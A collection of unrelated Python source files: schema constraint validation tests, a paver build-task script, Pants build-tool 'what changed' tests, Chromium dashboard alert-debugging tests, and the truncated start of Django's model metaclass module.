schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(2))
self.assertIsNone(constraint.validate(4))
self.assertIsNone(constraint.validate(6))
def test_in_range_validate_fail(self):
schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 8)
self.assertEqual('prop: 8 is out of range (min:2, max:6).',
str(error))
def test_equal_validate(self):
schema = {'equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
def test_equal_validate_fail(self):
schema = {'equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 8)
self.assertEqual('prop: 8 is not equal to "4".', str(error))
def test_greater_than_validate(self):
schema = {'greater_than': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(6))
def test_greater_than_validate_fail(self):
schema = {'greater_than': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3)
self.assertEqual('prop: 3 must be greater than "4".', str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate, 4)
self.assertEqual('prop: 4 must be greater than "4".', str(error))
def test_greater_than_invalid(self):
snippet = 'greater_than: {4}'
schema = yaml.safe_load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('greater_than must be comparable.', str(error))
def test_greater_or_equal_validate(self):
schema = {'greater_or_equal': 3.9}
constraint = Constraint('prop', Schema.FLOAT, schema)
self.assertIsNone(constraint.validate(3.9))
self.assertIsNone(constraint.validate(4.0))
def test_greater_or_equal_validate_fail(self):
schema = {'greater_or_equal': 3.9}
constraint = Constraint('prop', Schema.FLOAT, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3.0)
self.assertEqual('prop: 3.0 must be greater or equal to "3.9".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3.8)
self.assertEqual('prop: 3.8 must be greater or equal to "3.9".',
str(error))
def test_greater_or_equal_invalid(self):
snippet = 'greater_or_equal: {3.9}'
schema = yaml.safe_load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('greater_or_equal must be comparable.', str(error))
def test_less_than_validate(self):
schema = {'less_than': datetime.date(2014, 7, 25)}
constraint = Constraint('prop', Schema.TIMESTAMP, schema)
self.assertIsNone(constraint.validate(datetime.date(2014, 7, 20)))
self.assertIsNone(constraint.validate(datetime.date(2014, 7, 24)))
def test_less_than_validate_fail(self):
schema = {'less_than': datetime.date(2014, 7, 25)}
constraint = Constraint('prop', Schema.TIMESTAMP, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate,
datetime.date(2014, 7, 25))
self.assertEqual('prop: 2014-07-25 must be '
'less than "2014-07-25".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate,
datetime.date(2014, 7, 27))
self.assertEqual('prop: 2014-07-27 must be '
'less than "2014-07-25".',
str(error))
def test_less_than_invalid(self):
snippet = 'less_than: {3.9}'
schema = yaml.safe_load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('less_than must be comparable.', str(error))
def test_less_or_equal_validate(self):
schema = {'less_or_equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
self.assertIsNone(constraint.validate(3))
def test_less_or_equal_validate_fail(self):
schema = {'less_or_equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 5)
self.assertEqual('prop: 5 must be less or equal to "4".', str(error))
def test_less_or_equal_invalid(self):
snippet = 'less_or_equal: {3.9}'
schema = yaml.safe_load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('less_or_equal must be comparable.', str(error))
def test_invalid_length(self):
schema = {'length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('length must be integer.', str(error))
schema = {'length': 4.5}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('length must be integer.', str(error))
def test_length_validate(self):
schema = {'length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
def test_length_validate_fail(self):
schema = {'length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('length of prop: abc must be equal to "4".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate,
'abcde')
self.assertEqual('length of prop: abcde must be equal to "4".',
str(error))
def test_invalid_min_length(self):
schema = {'min_length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('min_length must be integer.', str(error))
def test_min_length_validate(self):
schema = {'min_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
self.assertIsNone(constraint.validate('abcde'))
def test_min_length_validate_fail(self):
schema = {'min_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('length of prop: abc must be at least "4".',
str(error))
def test_invalid_max_length(self):
schema = {'max_length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('max_length must be integer.', str(error))
def test_max_length_validate(self):
schema = {'max_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
self.assertIsNone(constraint.validate('abc'))
def test_max_length_validate_fail(self):
schema = {'max_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate,
'abcde')
self.assertEqual('length of prop: abcde must be no greater than "4".',
str(error))
def test_pattern_validate(self):
schema = {'pattern': '[0-9]*'}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('123'))
def test_pattern_validate_fail(self):
schema = {'pattern': '[0-9]*'}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('prop: "abc" does not match pattern "[0-9]*".',
str(error))
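# Hedged usage sketch of the two classes exercised above; the values are
# illustrative, but the calls mirror those in the tests:
#
#   schema = Schema('cpus', {'type': 'integer',
#                            'description': 'Number of CPUs.'})
#   constraint = Constraint('cpus', Schema.INTEGER, {'in_range': [1, 8]})
#   constraint.validate(4)   # returns None on success
#   constraint.validate(16)  # raises exception.ValidationError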
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import time
import subprocess
# Import parameters from the setup file.
sys.path.append('.')
from setup import (
setup_dict, get_project_files, print_success_message,
print_failure_message, _lint, _test, _test_all,
CODE_DIRECTORY, DOCS_DIRECTORY, TESTS_DIRECTORY, PYTEST_FLAGS)
from paver.easy import options, task, needs, consume_args
from paver.setuputils import install_distutils_tasks
options(setup=setup_dict)
install_distutils_tasks()
# Miscellaneous helper functions
def print_passed():
# generated on http://patorjk.com/software/taag/#p=display&f=Small&t=PASSED
print_success_message(r''' ___ _ ___ ___ ___ ___
| _ \/_\ / __/ __| __| \
| _/ _ \\__ \__ \ _|| |) |
|_|/_/ \_\___/___/___|___/
''')
def print_failed():
# generated on http://patorjk.com/software/taag/#p=display&f=Small&t=FAILED
print_failure_message(r''' ___ _ ___ _ ___ ___
| __/_\ |_ _| | | __| \
| _/ _ \ | || |__| _|| |) |
|_/_/ \_\___|____|___|___/
''')
class cwd(object):
"""Class used for temporarily changing directories. Can be though of
as a `pushd /my/dir' then a `popd' at the end.
"""
def __init__(self, newcwd):
""":param newcwd: directory to make the cwd
:type newcwd: :class:`str`
"""
self.newcwd = newcwd
def __enter__(self):
self.oldcwd = os.getcwd()
os.chdir(self.newcwd)
return os.getcwd()
def __exit__(self, type_, value, traceback):
# This acts like a `finally' clause: it will always be executed.
os.chdir(self.oldcwd)
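# Hedged usage sketch of `cwd` (the directory name is illustrative;
# _doc_make below shows the real use):
#
#   with cwd('docs'):
#       subprocess.call(['make', 'html'])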
# Task-related functions
def _doc_make(*make_args):
"""Run make in sphinx' docs directory.
:return: exit code
"""
if sys.platform == 'win32':
# Windows
make_cmd = ['make.bat']
else:
# Linux, Mac OS X, and others
make_cmd = ['make']
make_cmd.extend(make_args)
# Account for a stupid Python "bug" on Windows:
# <http://bugs.python.org/issue15533>
with cwd(DOCS_DIRECTORY):
retcode = subprocess.call(make_cmd)
return retcode
# Tasks
@task
@needs('doc_html', 'setuptools.command.sdist')
def sdist():
"""Build the HTML docs and the tarball."""
pass
@task
def test():
"""Run the unit tests."""
raise SystemExit(_test())
@task
def lint():
# This refuses to format properly when running `paver help' unless
# this ugliness is used.
('Perform PEP8 style check, run PyFlakes, and run McCabe complexity '
'metrics on the code.')
raise SystemExit(_lint())
@task
def test_all():
"""Perform a style check and run all unit tests."""
retcode = _test_all()
if retcode == 0:
print_passed()
else:
print_failed()
raise SystemExit(retcode)
@task
@consume_args
def run(args):
"""Run the package's main script. All arguments are passed to it."""
# The main script expects to get the called executable's name as
# argv[0]. However, paver doesn't provide that in args. Even if it did (or
# we dove into sys.argv), it wouldn't be useful because it would be paver's
# executable. So we just pass the package name in as the executable name,
# since it's close enough. This should never be seen by an end user
# installing through Setuptools anyway.
from corbel.main import main
raise SystemExit(main([CODE_DIRECTORY] + args))
@task
def commit():
"""Commit only if all the tests pass."""
if _test_all() == 0:
subprocess.check_call(['git', 'commit'])
else:
print_failure_message('\nTests failed, not committing.')
@task
def coverage():
"""Run tests and show test coverage report."""
try:
import pytest_cov # NOQA
except ImportError:
print_failure_message(
'Install the pytest coverage plugin to use this task, '
"i.e., `pip install pytest-cov'.")
raise SystemExit(1)
import pytest
pytest.main(PYTEST_FLAGS + [
'--cov', CODE_DIRECTORY,
'--cov-report', 'term-missing',
TESTS_DIRECTORY])
@task # NOQA
def doc_watch():
"""Watch for changes in the docs and rebuild HTML docs when changed."""
try:
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
except ImportError:
print_failure_message('Install the watchdog package to use this task, '
"i.e., `pip install watchdog'.")
raise SystemExit(1)
class RebuildDocsEventHandler(FileSystemEventHandler):
def __init__(self, base_paths):
self.base_paths = base_paths
def dispatch(self, event):
"""Dispatches events to the appropriate methods.
:param event: The event object representing the file system event.
:type event: :class:`watchdog.events.FileSystemEvent`
"""
for base_path in self.base_paths:
if event.src_path.endswith(base_path):
super(RebuildDocsEventHandler, self).dispatch(event)
# We found one that matches. We're done.
return
def on_modified(self, event):
print_failure_message('Modification detected. Rebuilding docs.')
# # Strip off the path prefix.
# import os
# if event.src_path[len(os.getcwd()) + 1:].startswith(
# CODE_DIRECTORY):
# # sphinx-build doesn't always pick up changes on code files,
# # even though they are used to generate the documentation. As
# # a workaround, just clean before building.
doc_html()
print_success_message('Docs have been rebuilt.')
print_success_message(
'Watching for changes in project files, press Ctrl-C to cancel...')
handler = RebuildDocsEventHandler(get_project_files())
observer = Observer()
observer.schedule(handler, path='.', recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
@task
@needs('doc_html')
def doc_open():
"""Build the HTML docs and open them in a web browser."""
doc_index = os.path.join(DOCS_DIRECTORY, 'build', 'html', 'index.html')
if sys.platform == 'darwin':
# Mac OS X
subprocess.check_call(['open', doc_index])
elif sys.platform == 'win32':
# Windows
subprocess.check_call(['start', doc_index], shell=True)
elif sys.platform.startswith('linux'):
# All freedesktop-compatible desktops
subprocess.check_call(['xdg-open', doc_index])
else:
print_failure_message(
"Unsupported platform. Please open `{0}' manually.".format(
doc_index))
@task
def get_tasks():
"""Get all paver-defined tasks."""
from paver.tasks import environment
for task in environment.get_tasks():
print(task.shortname)
@task
def doc_html():
"""Build the HTML docs."""
retcode = _doc_make('html')
if retcode:
raise SystemExit(retcode)
@task
def doc_clean():
"""Clean (delete) the built docs."""
retcode = _doc_make('clean')
if retcode:
raise SystemExit(retcode)
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.targets.java_protobuf_library import JavaProtobufLibrary
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.targets.python_thrift_library import PythonThriftLibrary
from pants.backend.core.from_target import FromTarget
from pants.backend.core.targets.resources import Resources
from pants.backend.core.tasks.what_changed import WhatChanged
from pants.backend.core.wrapped_globs import Globs, RGlobs
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.jvm.targets.unpacked_jars import UnpackedJars
from pants.backend.python.targets.python_library import PythonLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.goal.workspace import Workspace
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseWhatChangedTest(ConsoleTaskTestBase):
@property
def alias_groups(self):
return BuildFileAliases(
targets={
'java_library': JavaLibrary,
'python_library': PythonLibrary,
'jar_library': JarLibrary,
'unpacked_jars': UnpackedJars,
'resources': Resources,
'java_thrift_library': JavaThriftLibrary,
'java_protobuf_library': JavaProtobufLibrary,
'python_thrift_library': PythonThriftLibrary,
},
context_aware_object_factories={
'globs': Globs.factory,
'rglobs': RGlobs.factory,
'from_target': FromTarget,
},
objects={
'jar': JarDependency,
'scala_jar': ScalaJarDependency,
}
)
@classmethod
def task_type(cls):
return WhatChanged
def assert_console_output(self, *output, **kwargs):
options = {'spec_excludes': [], 'exclude_target_regexp': []}
if 'options' in kwargs:
options.update(kwargs['options'])
kwargs['options'] = options
super(BaseWhatChangedTest, self).assert_console_output(*output, **kwargs)
def workspace(self, files=None, parent=None, diffspec=None, diff_files=None):
class MockWorkspace(Workspace):
def touched_files(_, p):
self.assertEqual(parent or 'HEAD', p)
return files or []
def changes_in(_, ds):
self.assertEqual(diffspec, ds)
return diff_files or []
return MockWorkspace()
class WhatChangedTestBasic(BaseWhatChangedTest):
def test_nochanges(self):
self.assert_console_output(workspace=self.workspace())
def test_parent(self):
self.assert_console_output(options={'changes_since': '42'},
workspace=self.workspace(parent='42'))
def test_files(self):
self.assert_console_output(
'a/b/c',
'd',
'e/f',
options={'files': True},
workspace=self.workspace(files=['a/b/c', 'd', 'e/f'])
)
class WhatChangedTest(BaseWhatChangedTest):
def setUp(self):
super(WhatChangedTest, self).setUp()
self.add_to_build_file('root/src/py/a', dedent("""
python_library(
name='alpha',
sources=['b/c', 'd'],
resources=['test.resources']
)
jar_library(
name='beta',
jars=[
jar(org='gamma', name='ray', rev='1.137.bruce_banner')
]
)
"""))
self.add_to_build_file('root/src/py/1', dedent("""
python_library(
name='numeric',
sources=['2']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/a', dedent("""
python_library(
name='a',
sources=['a.py'],
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/b', dedent("""
python_library(
name='b',
sources=['b.py'],
dependencies=['root/src/py/dependency_tree/a']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/c', dedent("""
python_library(
name='c',
sources=['c.py'],
dependencies=['root/src/py/dependency_tree/b']
)
"""))
self.add_to_build_file('root/src/thrift', dedent("""
java_thrift_library(
name='thrift',
sources=['a.thrift']
)
python_thrift_library(
name='py-thrift',
sources=['a.thrift']
)
"""))
self.add_to_build_file('root/src/resources/a', dedent("""
resources(
name='a_resources',
sources=['a.resources']
)
"""))
self.add_to_build_file('root/src/java/a', dedent("""
java_library(
name='a_java',
sources=rglobs("*.java"),
)
"""))
self.add_to_build_file('root/3rdparty/BUILD.twitter', dedent("""
jar_library(
name='dummy',
jars=[
jar(org='foo', name='ray', rev='1.45')
])
"""))
self.add_to_build_file('root/3rdparty/BUILD', dedent("""
jar_library(
name='dummy1',
jars=[
jar(org='foo1', name='ray', rev='1.45')
])
"""))
# This is a directory that might confuse case-insensitive file systems (on Macs, for example).
# It should not be treated as a BUILD file.
self.create_dir('root/scripts/a/build')
self.add_to_build_file('root/scripts/BUILD', dedent("""
java_library(
name='scripts',
sources=['a/build/scripts.java'],
)
"""))
self.add_to_build_file('BUILD.config', dedent("""
resources(
name='pants-config',
sources = globs('pants.ini*')
)
"""))
def test_spec_excludes(self):
self.assert_console_output(
'root/src/py/a:alpha',
options={'spec_excludes': 'root/src/py/1'},
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d'])
)
def test_owned(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
)
def test_multiply_owned(self):
self.assert_console_output(
'root/src/thrift:thrift',
'root/src/thrift:py-thrift',
workspace=self.workspace(files=['root/src/thrift/a.thrift'])
)
def test_build(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/a:beta',
workspace=self.workspace(files=['root/src/py/a/BUILD'])
)
def test_resource_changed(self):
self.assert_console_output(
'root/src/py/a:alpha',
workspace=self.workspace(files=['root/src/py/a/test.resources'])
)
def test_resource_changed_for_java_lib(self):
self.assert_console_output(
'root/src/resources/a:a_resources',
workspace=self.workspace(files=['root/src/resources/a/a.resources'])
)
def test_build_sibling(self):
self.assert_console_output(
'root/3rdparty:dummy',
workspace=self.workspace(files=['root/3rdparty/BUILD.twitter'])
)
def test_resource_type_error(self):
self.add_to_build_file('root/src/resources/a1', dedent("""
java_library(
name='a1',
sources=['a1.test'],
resources=[1]
)
"""))
self.assert_console_raises(
Exception,
workspace=self.workspace(files=['root/src/resources/a1/a1.test'])
)
def test_build_directory(self):
# This should ensure that a directory named the same as build files does not cause an exception.
self.assert_console_output(
'root/scripts:scripts',
workspace=self.workspace(files=['root/scripts/a/build', 'root/scripts/a/build/scripts.java'])
)
def test_fast(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'fast': True},
workspace=self.workspace(
files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec_removed_files(self):
self.assert_console_output(
'root/src/java/a:a_java',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/java/a/b/c/Foo.java'],
),
)
def test_include_dependees(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
options={'include_dependees': 'direct'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_exclude(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive', 'exclude_target_regexp': [':b']},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_deferred_sources(self):
self.add_to_build_file('root/proto', dedent("""
java_protobuf_library(name='unpacked_jars',
sources=from_target(':external-source'),
)
unpacked_jars(name='external-source',
libraries=[':external-source-jars'],
include_patterns=[
'com/squareup/testing/**/*.proto',
],
)
jar_library(name='external-source-jars',
jars=[
jar(org='com.squareup.testing.protolib', name='protolib-external-test', rev='0.0.2'),
],
)
"""))
self.assert_console_output(
'root/proto:unpacked_jars',
'root/proto:external-source',
'root/proto:external-source-jars',
workspace=self.workspace(files=['root/proto/BUILD'])
)
def test_root_config(self):
self.assert_console_output(
':pants-config',
workspace=self.workspace(files=['pants.ini'])
)
|
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import mock
import webapp2
import webtest
from dashboard import debug_alert
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
_SAMPLE_SERIES = [
(300, 60.06), (301, 60.36), (302, 61.76), (303, 60.06), (304, 61.24),
(305, 60.65), (306, 55.61), (307, 61.88), (308, 61.51), (309, 59.58),
(310, 71.79), (311, 71.97), (312, 71.63), (313, 67.16), (314, 70.91),
(315, 73.40), (316, 71.00), (317, 69.45), (318, 67.16), (319, 66.05),
]
class DebugAlertTest(testing_common.TestCase):
def setUp(self):
super(DebugAlertTest, self).setUp()
app = webapp2.WSGIApplication(
[('/debug_alert', debug_alert.DebugAlertHandler)])
self.testapp = webtest.TestApp(app)
self.PatchDatastoreHooksRequest()
def _AddSampleData(self):
"""Adds a Test and Row entities, and returns the Test key."""
testing_common.AddTests(['M'], ['b'], {'suite': {'foo': {}}})
test_path = 'M/b/suite/foo'
rows_dict = {x: {'value': y} for x, y in _SAMPLE_SERIES}
testing_common.AddRows(test_path, rows_dict)
return utils.TestKey(test_path)
def testGet_WithInvalidTestPath_ShowsFormAndError(self):
response = self.testapp.get('/debug_alert?test_path=foo')
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
def testGet_WithValidTestPath_ShowsChart(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
self.assertIn('id="plot"', response.body)
def testPost_SameAsGet(self):
# Post is the same as get for this endpoint.
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
get_response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
post_response = self.testapp.post('/debug_alert?test_path=%s' % test_path)
self.assertEqual(get_response.body, post_response.body)
def testGet_WithNoParameters_ShowsForm(self):
response = self.testapp.get('/debug_alert')
self.assertIn('<form', response.body)
self.assertNotIn('id="plot"', response.body)
def testGet_WithRevParameter_EmbedsCorrectRevisions(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 10, 5))
self.assertEqual(
[300, 301, 302, 303, 304, 305, 306, 307, 308, 309],
self.GetEmbeddedVariable(response, 'LOOKUP'))
def testGet_InvalidNumBeforeParameter_ShowsFormAndError(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 'foo', 5))
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
self.assertNotIn('LOOKUP', response.body)
def _AddAnomalyConfig(self, config_name, test_key, config_dict):
"""Adds a custom anomaly config which applies to one test."""
anomaly_config_key = anomaly_config.AnomalyConfig(
id=config_name,
config=config_dict,
patterns=[utils.TestPath(test_key)]).put()
return anomaly_config_key
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_TestHasOverriddenConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
# Add a config which applies to the test. The test is updated upon put.
self._AddAnomalyConfig('X', test_key, {'min_absolute_change': 10})
test_key.get().put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_absolute_change=10)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_absolute_change": 10', response.body)
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_WithValidCustomConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key),
'{"min_relative_change":0.75}'))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_relative_change=0.75)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_relative_change": 0.75', response.body)
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_WithBogusParameterNames_ParameterIgnored(self, simulate_mock):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key), '{"foo":0.75}'))
simulate_mock.assert_called_once_with(mock.ANY)
self.assertNotIn('"foo"', response.body)
def testGet_WithInvalidCustomConfig_ErrorShown(self):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key), 'not valid json'))
# The error message should be on the page; JS constants should not be.
self.assertIn('Invalid JSON', response.body)
self.assertNotIn('LOOKUP', response.body)
def testGet_WithStoredAnomalies_ShowsStoredAnomalies(self):
test_key = self._AddSampleData()
anomaly.Anomaly(
test=test_key, start_revision=309, end_revision=310,
median_before_anomaly=60, median_after_anomaly=70,
bug_id=12345).put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# Information about the stored anomaly should be somewhere on the page.
self.assertIn('12345', response.body)
def testFetchLatestRows(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchLatestRows(test_key.get(), 4)
revisions = [r.revision for r in rows]
self.assertEqual([316, 317, 318, 319], revisions)
def testFetchAroundRev(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 8)
revisions = [r.revision for r in rows]
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317],
revisions)
def testFetchRowsAroundRev_NotAllRowsAvailable(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 100, 100)
# There are only 20 rows in the sample data, so only 20 can be fetched.
self.assertEqual(20, len(rows))
def testChartSeries(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 5)
# The indexes used in the chart series should match those in the lookup.
self.assertEqual(
[(0, 60.65), (1, 55.61), (2, 61.88), (3, 61.51), (4, 59.58),
(5, 71.79), (6, 71.97), (7, 71.63), (8, 67.16), (9, 70.91)],
debug_alert._ChartSeries(rows))
def testRevisionList(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 5)
# The revision list maps chart indexes to revision numbers (x-values) in the input series.
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314],
debug_alert._RevisionList(rows))
def testCsvUrl_RowsGiven_AllParamsSpecified(self):
self._AddSampleData()
rows = graph_data.Row.query().fetch(limit=20)
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo&num_points=20&rev=319',
debug_alert._CsvUrl('M/b/suite/foo', rows))
def testCsvUrl_NoRows_OnlyTestPathSpecified(self):
# If there are no rows available for some reason, a CSV download
# URL can still be constructed, but without specific revisions.
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo',
debug_alert._CsvUrl('M/b/suite/foo', []))
def testGraphUrl_RevisionGiven_RevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both strings and ints are accepted for the revision.
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), 310))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), '310'))
def testGraphUrl_NoRevisionGiven_NoRevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both None and empty string mean "no revision".
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), ''))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), None))
if __name__ == '__main__':
unittest.main()
|
|
import types
import sys
from itertools import izip
import django.db.models.manager # Imported to register signal handler.
from django.core.exceptions import (ObjectDoesNotExist,
MultipleObjectsReturned, FieldError, ValidationError, NON_FIELD_ERRORS)
from django.core import validators
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.related import (OneToOneRel, ManyToOneRel,
OneToOneField, add_lazy_relation)
from django.db.models.query import Q
from django.db.models.query_utils import DeferredAttribute
from django.db.models.deletion import Collector
from django.db.models.options import Options
from django.db import (connections, router, transaction, DatabaseError,
DEFAULT_DB_ALIAS)
from django.db.models import signals
from django.db.models.loading import register_models, get_model
from django.utils.translation import ugettext_lazy as _
import django.utils.copycompat as copy
from django.utils.functional import curry, update_wrapper
from django.utils.encoding import smart_str, force_unicode
from django.utils.text import get_text_list, capfirst
from django.conf import settings
class ModelBase(type):
"""
Metaclass for all models.
"""
def __new__(cls, name, bases, attrs):
super_new = super(ModelBase, cls).__new__
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
# If this isn't a subclass of Model, don't do anything special.
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
